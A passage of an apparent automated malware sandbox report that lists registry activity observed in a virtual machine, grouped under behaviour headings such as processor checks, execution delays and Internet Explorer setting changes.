| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133621399044496276" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{0B3398EA-00F1-418b-AA31-6F2F9BE5809B}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Female" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\freedesktopsoft.com\Total = "4017" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Microsoft Zira Mobile" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "HW" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c94497aff6b7da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\freedesktopsoft.com\Number = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "HKEY_LOCAL_MACHINE/SOFTWARE\\Microsoft\\Speech_OneCore\\AudioOutput\\TokenEnums\\MMAudioOut\\" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "11.0.2016.0129" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\freedesktopsoft.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\freedesktopsoft.com\ = "3981" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
